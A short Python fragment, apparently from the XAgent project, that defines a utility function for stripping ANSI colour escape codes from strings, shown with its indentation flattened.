from typing import Any
import uuid
from threading import Lock
from colorama import Fore, Style
from XAgent.utils import Singleton, TaskSaveItem
def remove_color_codes(s: str) -> str:
if not isinstance(s,str):
try:
s = json.dumps(s)
except:
s = str(s)
ansi_escape = re.compile(r"\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])")
return ansi_escape.sub("", s) | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.